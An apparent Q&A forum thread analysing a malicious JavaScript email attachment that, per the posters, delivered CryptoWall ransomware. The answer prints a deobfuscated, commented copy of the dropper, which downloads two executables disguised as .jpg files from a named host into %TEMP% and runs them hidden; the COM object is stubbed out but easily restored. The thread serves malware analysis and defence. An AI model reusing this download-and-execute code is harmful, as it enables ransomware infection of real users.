
If anybody knows what is going on in this JavaScript file, could you please tell me? A client of ours got this as an email and well... Now she can't open up any docs or spreadsheets. Also looks like it spread to the rest of the network.

If somebody could help me make sense of it, I would be most grateful.

I've deleted it, not something I want anybody else to get hold of.

I probably don't need to tell anybody, but please don't open it unless it's in a sandbox. I am not responsible if you brick your PC.

Source: PM me for the file rather.

IT kid
  • It is using `WScript.Shell` to do something, not sure what yet, I'll look into it – epoch Mar 13 '15 at 07:59
  • Linking in that manner, to what you think is a virus, is careless. I hope most people read before clicking, and that they don't allow ActiveX content to run from unknown domains obviously. – Mackan Mar 13 '15 at 07:59

1 Answer


Basically, it's downloading a virus to your temp folder and executing it...

You should run a virus scan on the entire network.

var AxProxy = function() {};   // stand-in for ActiveXObject: every COM call below becomes a no-op

(function () {
    // fr: URL to fetch, Klw: file name to save under %TEMP%, rn: run the file if > 0
    function fFh(fr, Klw, rn) {
        var VeZ = new AxProxy('WScript.Shell');
        // full path of the dropped file: %TEMP%\<name>
        var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw;
        var OG4 = new AxProxy('MSXML2.XMLHTTP');

        // when the request completes, write the raw response body to disk
        OG4['onReadyStateChange'] = function() {
            if (OG4['readyState'] === 4) {
                var g38 = new AxProxy('ADODB.Stream');

                g38['open']();
                g38['type'] = 1;                    // 1 = adTypeBinary
                g38['write'](OG4['ResponseBody']);
                g38['position'] = 0;
                g38['saveToFile'](Klw, 2);          // 2 = adSaveCreateOverWrite
                g38['close']();
            }
        };

        try {
            OG4['open']('GET', fr, false);          // synchronous GET
            OG4['send']();

            if (rn > 0) {
                VeZ['Run'](Klw, 0, 0);              // launch the saved file, window hidden, no wait
            }
        } catch (er) {}
    }

    // two downloads, each saved as an .exe in %TEMP% and run
    fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
    fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
})();

All the other variables are just gibberish intended to confuse and discourage decoding.

PS: I've proxied ActiveXObject so this can't be run...

epoch
  • Just for interest's sake if anybody wanted to know. It creates a backdoor to upload somebody else's cryptowall virus and spreads it like nothing I've ever seen. Deleting the code. Could a mod please close and lock this? – IT kid Mar 13 '15 at 09:51